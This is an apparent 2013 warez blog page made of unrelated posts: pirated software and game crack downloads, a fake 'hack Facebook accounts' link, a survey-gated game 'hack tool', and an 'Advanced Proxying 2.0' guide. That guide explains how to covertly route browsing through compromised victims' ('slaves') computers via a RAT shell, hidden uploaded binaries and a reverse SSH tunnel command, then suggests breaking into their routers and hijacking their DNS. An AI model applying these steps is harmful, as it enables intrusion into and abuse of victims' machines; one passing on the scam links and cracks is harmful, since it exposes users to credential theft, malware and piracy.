sobota, 20 kwietnia 2013

Know The Tricks To Hack FB AccoUnt

just visit this simple site and start hacking fb accounts ..

http://file.bombhack.com/8WVPz

it will redirect you to the Facebook page ..

All you have to do is Just follow these 3 simple steps : 
1. Log in with a genuine id .
2. After you get logged in you will see a box you have to enter the id of the victim
3. Click on the "HACK" button .

After 5 mints you will be awarded with the victims "ID" and "PASSWORD" .

enjoY ;) :D :D

DIRECT X 11 highly compressed (1.5 MB ) UPPIT LINK DIRECT DOWNLOAD LINK


DIRECT X 11 highly compressed (1.5 MB )

DIRECT X 11 highly compressed (1.5 MB ) UPPIT LINK DIRECT DOWNLOAD LINK

GUYS This is very DIRECT X 11 for it , the very slow Internet connections were compressed
.
IT took six hours to compress SMALL.SO IRECOMMEND SO YOU ALL TO USE KGB Archiver to unzip the file AND THE ORIGINAL FILE GET
.
DOWNLOAD LINKS

MEGAUPLOAD LINKS

click here to download

uppit download link


If This Software Link are Fail or Deleted Please make comment. We are trying to re-upload this thanks.

Cisco Configuration Professional 2.3 Free

 Cisco Configuration Professional 2.3
 Cisco Configuration Professional 2.3 | 168.26 MB

Cisco ® Configuration Professional is a graphical management environment routers Cisco, including 7200 and 7301 series. This application makes setting up such basic prametrov as: security, wireless networks, voice functions, etc.
Cisco ® Configuration Professional is a graphical management environment routers Cisco, including 7200 and 7301 series. This application makes setting up such basic prametrov as: security, wireless networks, voice functions, etc.

It also allows for real-time monitoring, statistics collection and analysis of performance. This application has replaced the Cisco Router and Security Device Manager (SDM). The application exists in two versions: standard (for installation on a PC) and lightweight (for installation on a router) - Cisco Configuration Professional Express.

Simplify Router Deployment and Management

Enhance productivity and help network and security administrators and channel partners deploy routers with increased confidence and ease. Cisco Configuration Professional is a GUI device management tool for Cisco access routers. It simplifies router, firewall, intrusion prevention system (IPS), VPN, Unified Communications, WAN, and LAN configuration with easy-to-use wizards.

The tool also offers:

* One-click router lockdown
* Innovative voice and security auditing capability to check and recommend changes to router configuration
* Monitoring of router status
* Troubleshooting of WAN and VPN connectivity issues

Reduce Total Cost of Ownership

By relying on best-practice configurations approved by the Cisco Technical Assistance Center (TAC), customers can:

* Lower the total cost of ownership of Cisco routers
* Reduce human errors
* Simplify initial setup in voice deployments
* Help ensure proper linkage between users, dialing plans, and voicemail settings

Cisco Configuration Professional offers smart wizards and advanced configuration support for LAN and WAN interfaces, Network Address Translation (NAT), stateful and application firewall policy, IPS, IPSec and SSL VPN, QoS, and Cisco Network Admission Control policy features. The firewall wizard allows a single-step deployment of high, medium, or low firewall policy settings. CCP also offers a one-click router lockdown and an innovative security auditing capability to check and recommend changes to router configuration based on Cisco TAC recommendations.

Cisco Configuration Professional allows IT managers to easily organize and manage multiple routers at a single site.

System requirements:
- 2 GHz processor or faster
- 1 GB DRAM minimum; 2 GB recommended
- HDD 400 MB
- Internet Explorer 6.0 or above
- 1024 X 768
- JRE versions minimum 1.5.0_11 upto 1.6.0_17 are supported.
- Adobe Flash Player Version 10.0 or later, with Debug set to No

Homepage - http://www.cisco.com/en/US/products/ps9422/
Download From HotFile


Download From FileSonic


 
 

Tomb Raider v1.0.718.4 Update-SKIDROW


Release Name: Tomb.Raider.v1.0.718.4.Update-SKIDROW
Size: 186.00 MB
Publisher: SQUARE ENIX, Eidos Interactive
Developer: Crystal Dynamics
Genre: Action, Adventure


Changelogs:
  • Addressed some stability and startup issues on machines that have both Intel and NVIDIA graphics hardware.
  • Fix for players being unable to progress related to the boat in the beach area.
  • Some fixes for crashes on startup and when selecting Options.
  • Some small improvements to TressFX hair rendering.
  • Fixes for various graphics glitches, including certain effects not being visible in fullscreen mode.
  • Fixed a problem that caused some users to not be able to use exclusive fullscreen.
  • Added support for separate mouse/gamepad inversion for aiming, as well as support for x-axis inversion.
  • Fixes related to the benchmark scene and benchmark mode.
  • Various other small fixes.
INSTALL NOTES
  • Unpack the release
  • Mount or burn image
  • Install
  • Copy the cracked content from the SKIDROW folder and into the main
  • install folder and overwrite
  • Block the game in your firewall if needed
  • Play the game
  • Support the companies, which software you actually enjoy

Download Tomb Raider v1.0.718.4 Update-SKIDROW from web

Download Tomb Raider v1.0.718.4 Update-SKIDROW from torrent

Advanced Proxying 2.0

Advanced Proxying 2.0

Disclaimer : This post is for educational purposes of learning network security.
I am not responsible what you do with this information.

Updated: How to use your slaves connection to browse the internet

After extensive research and testing, I have found a much better and more stable way to pull off browsing the internet through your slave's machine. Ncat is not a part of this guide as it is not very stable for creating a proxy server.

Remember. This is an exercise in the art of subtlety. We want to be able to use the Slave as a transparent proxy WITHOUT tipping them off!

What you will need:

An SSH server running on your local machine - I have found that BitVise SSH server does not have control flow errors in tunneling like the other options http://www.bitvise.com/
Port 22 forwarded on your router to the machine running BitVise SSH server.
Firefox with FoxyProxy STANDARD Add-On installed
Plink executable - command line putty. I'm not linking it. May the google-fu be strong with you...
*gproxy and config file - an autoit script for a stealth proxy server
Slaves - duh

I did not create gproxy, I only tweaked the code to my liking. Reinventing the wheel is not high on my list

I'm not going to go over portforwarding with you. If you setup port forwarding for a RAT you should be able to setup a simple forward for port 22.

Installing Bitvise SSH Server.

When you go to install this ssh server, do not forget to choose PERSONAL EDITION! If you don't, your install will only be active for 30 days.

As soon as the installation is done, you'll be presented With this:

[Image: KIBAktZ.jpg]

Click on open easy settings and you will get this screen, make sure it matches what I have below:

[Image: suD47ih.jpg]

Click on tab 3 and then add a virtual account. Click on the blue link to set password:

[Image: pwh3AET.jpg]


[Image: 8leQgEc.jpg]

Save changes, then click on start server on the main Bitvise control panel.

Setting them up to proxy


As stated before, gproxy.exe is just an autoit script that I found that does the job we need and config.ini is just the port settings. The contents of config.ini should be:
Code:

[SYSTEM]
PROXYPORT=8080
PROXYIP=127.0.0.1
PROXYPORTSSL=8181

I am not going to link the executable here, im simply going to give you the autoit script. Go get auto it and compile it yourself you lazy bastards!:

Anyway after compiling gproxy, upload gproxy.exe, config.ini, and plink.exe to the slaves machine. The best spot I have found is C:\Users\[nameofslave]\appdata\.

Starting the proxy process and tunnelling

Open up the remote shell and navigate to the directory where you uploaded the three files. Simply type gproxy.exe to start the process. The code was tweaked to run hidden and no tray icon.

Now close the shell, and open another shell. This time, you're going to navigate to the same directory, but your're going to run the following command:

Code:

plink.exe -R 8080:127.0.0.1:8080 -R 8181:127.0.0.1:8181 ipaddress -l loginname -pw password

It's going to ask you if u want to cache the server, yadda yadda..type N for no. Because you don't want to leave a footprint on the slave's machine. At this point you should be left with a shell to your ssh server, from the remote shell..(I know, it's confusing...shell in a shell..SHELLCEPTION!)

Setting up Foxy Proxy Settings.

Not going to lie. I may lose some of you on this. It's ok. If you get dizzy, you may want to sit down for a minute before you hurt yourself...

This is what it should look like without anything in it:

[Image: QObaXJa.jpg]

Click on add proxy and follow the settings for the three tabs accordingly:

[Image: 2ilDyMT.jpg]


[Image: Yf3cZXe.jpg]


[Image: F8NN4CR.jpg]


[Image: cb7yamp.jpg]


[Image: rQD8cc7.jpg]


[Image: TJguCBh.jpg]


[Image: F8NN4CR.jpg]


[Image: DXppGbB.jpg]

(url patterns are HTTP://* and HTTPS://*

This should be the finished product:

[Image: xjTu3OO.jpg]

Important to note is that when you're using them as a proxy, select mode to "Use proxies based on their pre-defined patterns and priorities"

Browse out to google and type "what's my ip address". It should be the slave's external WAN address now...

Dafuq did I just do???

Let me break it down. You're making an ssh connection back to your ssh server from the slave. SSH is very useful for tunneling traffic mostly because you don't need to keep adding port
forwarding rules to your router and the traffic is encrypted.

With the plink command, essentially you're making 2 tunnels. One for HTTP traffic and one for HTTPS traffic. Essentially you're opening two tunnels with the dual -R flag. Your computer is now listening on both 8080 and 8181 and forwarding anything that is sent to it to the slaves machine on those same ports.

Gproxy.exe on the remote machine is then intercepting that traffic, and forwarding it out to the host, then sending data back to the "local" machine you are on.

Foxy proxy is matching url patterns to send traffic to the right tunnel. HTTP to 8080 and HTTPS to 8181.

Quick summary logic.

1. Install ssh server on your local machine

2. Port forward port 22 on your router to the ssh server computer

3. Upload gproxy.exe, config.ini and plink.exe to slave in a discreet place

4. start gproxy.exe on slaves machine

5. close remote shell window and reopen, run plink.exe -R 8080:127.0.0.1:8080 -R
8181:127.0.0.1:8181 ipaddress -l loginname -pw password

6. setup your local browser to proxy HTTP to 127.0.0.1 port 8080 and HTTPS to 127.0.0.1 port 8181


Fun things to do once this is setup:
Try to access slaves router and use default credentials
Point their DNS somewhere fun!
Sign up for an email account using that ip address.

BEFORE YOU ASK. NO you cannot use this to log into JAGEX'd RS accounts. That is outside the scope of this tutorial as the Java program that runs RS does not go through the proxy when you load it.

That does not mean it can't be done, it means that there is more to it than that.

What's to come:

Working on a guide to do this then setup a vpn connection so you are totally on their network to defeat Jagex.


Code for autoit gproxy

inb4wheredoifindgproxy!


Confrontation Web Card Game Hack Tool 2013 Update Free Download

"Confrontation" is a new web card game based on the famous miniature war game from Rackham.
It's an incredible card game based on the rich lore, beautiful world, and stunning characters of Aarklash.
Players assemble their own army decks, with the hero of their choice, through an epic story seeing famous enemies.
Decks can be upgraded with booster packs sold in the game shop.
Also players are able to battle their friends, or play in tournaments to test their skills and tactics.

Features:
- Card Generator
- Gold Generator
- Gems Generator
- Silver Generator
- Prepaid Reward Generator
- Unlimited Energy Hack
- Unlimited EXP Adder


HOW TO DOWNLOAD Confrontation Web Card Game Hack Tool 2013 Update Free Download:
1. Click the button above
2. Click "Download Now" button
3. Do the survey you choose
4. Download the file! (Sometimes it fails and downloads wrong file, like crack for a random game or stuff, if it happens you have to try to do it again)

Flash Player Pro 5.5 Full Mediafire Patch Crack Download


Flash Player Pro 5.5 Full Version

Flash Player Pro 5.5 Full Mediafire Patch Crack Download

Flash Player Pro is a handy flash tool kit designed as Adobe flash player and manager . It has several powerful flash tools: download flash movies from the Internet, preview and browse flash movie, capture flash image and set it as wallpaper, create flash screensaver with ease, make conversion between SWF and EXE flash movies etc. All of these features will help you enhance and extend the using possibility of existing flash files. And with friendly user interface, Flash Player Pro offers you a fantastic animated flash world!


Download Here: